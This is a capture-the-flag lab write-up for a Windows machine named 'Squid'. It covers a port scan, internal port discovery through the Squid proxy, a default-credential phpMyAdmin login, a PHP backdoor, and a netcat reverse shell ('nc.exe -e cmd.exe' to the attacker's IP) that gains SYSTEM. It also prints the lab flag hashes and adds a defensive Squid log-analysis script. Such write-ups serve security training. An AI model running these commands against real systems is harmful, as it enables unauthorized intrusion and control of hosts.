Squid
Proving Ground Practice easy-level machine! You are going to learn about Squid connections and RFI.
Port Scan Results ⤵️
┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Squid]
└─$ sudo nmap -sC -sV -p- -vv -T4 -oN Nmap_Results.txt -Pn 192.168.156.189
Nmap scan report for 192.168.156.189
Host is up, received user-set (0.10s latency).
Scanned at 2024-06-21 21:28:43 IST for 250s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3128/tcp open http-proxy syn-ack ttl 125 Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-21T16:02:15
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 54801/tcp): CLEAN (Timeout)
| Check 2 (port 30810/tcp): CLEAN (Timeout)
| Check 3 (port 12856/udp): CLEAN (Timeout)
| Check 4 (port 29016/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 0s
Squid Enumeration ⤵️
This Squid HTTP proxy allows us to access connections on different ports using tools like spose.py and Burp Suite.
For further information I used HackTricks.
┌──(kali🔥kali)-[~/…/Proving_Ground/Practice/Squid/spose]
└─$ python3 spose.py --proxy http://192.168.156.189:3128 --target 192.168.156.189
Using proxy address http://192.168.156.189:3128
192.168.156.189 3306 seems OPEN
192.168.156.189 8080 seems OPEN
As I ran the spose.py tool, it gave me the redirect ports, but to access them I need to set up the proxy in Burp Suite on port 3128.
So I accessed http://192.168.156.189:8080 and got access to a Wampserver page.
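As an added example (not part of the original write-up and not spose.py's code): a defender can spot this kind of port discovery in Squid's access.log, where a single client asks the proxy for many different ports on the proxy host's own address. The log lines below are constructed, and `PROXY_SELF`, `target_of` and `self_probes` are hypothetical names.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: addresses that belong to the proxy host itself.
PROXY_SELF = {"192.168.156.189", "127.0.0.1", "localhost"}

# Constructed sample in Squid's native access.log layout:
# time elapsed client code/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1718985601.101  12 192.168.45.157 TCP_MISS/503 4012 GET http://192.168.156.189:21/ - HIER_NONE/- text/html
1718985601.240  35 192.168.45.157 TCP_MISS/200 1530 GET http://192.168.156.189:3306/ - HIER_DIRECT/192.168.156.189 -
1718985601.388  41 192.168.45.157 TCP_MISS/200 6120 GET http://192.168.156.189:8080/ - HIER_DIRECT/192.168.156.189 text/html
1718985602.010   9 192.168.45.157 TCP_TUNNEL/200 0 CONNECT 192.168.156.189:445 - HIER_DIRECT/192.168.156.189 -
1718985610.500 120 10.0.0.5 TCP_MISS/200 9000 GET http://example.com/index.html - HIER_DIRECT/203.0.113.10 text/html
1718985611.900  15 10.0.0.5 TCP_MISS/200 700 GET http://192.168.156.189:8080/ - HIER_DIRECT/192.168.156.189 text/html
"""

def target_of(method, url):
    """Return (host, port) for a logged request, or None if it cannot be parsed."""
    if method == "CONNECT":  # CONNECT logs a bare host:port, not a URL
        host, _, port = url.rpartition(":")
        return (host, int(port)) if host and port.isdigit() else None
    parts = urlsplit(url)
    try:
        port = parts.port or {"http": 80, "https": 443}.get(parts.scheme)
    except ValueError:  # non-numeric or out-of-range port
        return None
    if not parts.hostname or port is None:
        return None
    return (parts.hostname, port)

def self_probes(log_text, min_ports=3):
    """Map client -> sorted ports it requested on the proxy's own addresses,
    keeping only clients that touched at least min_ports distinct ports."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # truncated or non-native log line
        client, method, url = fields[2], fields[5], fields[6]
        target = target_of(method, url)
        if target and target[0] in PROXY_SELF:
            seen[client].add(target[1])
    return {c: sorted(p) for c, p in seen.items() if len(p) >= min_ports}

if __name__ == "__main__":
    for client, ports in self_probes(SAMPLE_LOG).items():
        print(f"{client} probed proxy-local ports via Squid: {ports}")
```

The threshold is a tuning knob: a legitimate client may reach one or two services on the proxy host, while a sweep touches many distinct ports in a short window.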
Now I also got phpMyAdmin on this machine. I logged in to it with default creds and checked for any SQL command execution.
I also got to know the file system location at which this site is hosted from the phpinfo.php page.
I used the SQL for RFI and it worked like this 🔻
I got command execution now as nt authority\system.
Here is how I got the connection made for a stable shell 🔻
192.168.156.189:8080/backdoor.php?cmd=nc.exe%20-e%20cmd.exe%20192.168.45.157%20445
I caught the response on port 445 and I am nt authority\system now 🔻
┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Squid]
└─$ rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.156.189] 49999
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\wamp\www>whoami
whoami
nt authority\system
C:\wamp\www>cd C:\Users\Administrator
cd C:\Users\Administrator
C:\Users\Administrator>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 5C30-DCD7
C:.
+---3D Objects
+---Contacts
+---Desktop
| proof.txt
|
+---Documents
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
C:\Users\Administrator>type Desktop\proof.txt
type Desktop\proof.txt
ebe9584613557c8c2c915cce5570c6dd
C:\Users\Administrator>cd ../
cd ../
C:\Users>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\
06/21/2024 08:57 AM 34 local.txt
06/21/2024 08:57 AM 2,697 output.txt
05/28/2021 04:20 AM <DIR> PerfLogs
05/28/2021 06:06 AM <DIR> Program Files
05/28/2021 03:53 AM <DIR> Program Files (x86)
11/23/2021 09:48 AM <DIR> Squid
05/28/2021 03:53 AM <DIR> Users
11/23/2021 01:05 PM <DIR> wamp
11/19/2021 12:12 AM <DIR> Windows
05/28/2021 06:04 AM <DIR> Windows10Upgrade
2 File(s) 2,731 bytes
8 Dir(s) 8,782,487,552 bytes free
C:\>type local.txt
type local.txt
ade423e4b0f6672bc92c319e93de8e66
C:\>
I am nt authority\system now!!
If you have any questions or suggestions, please leave a comment below. Thank you!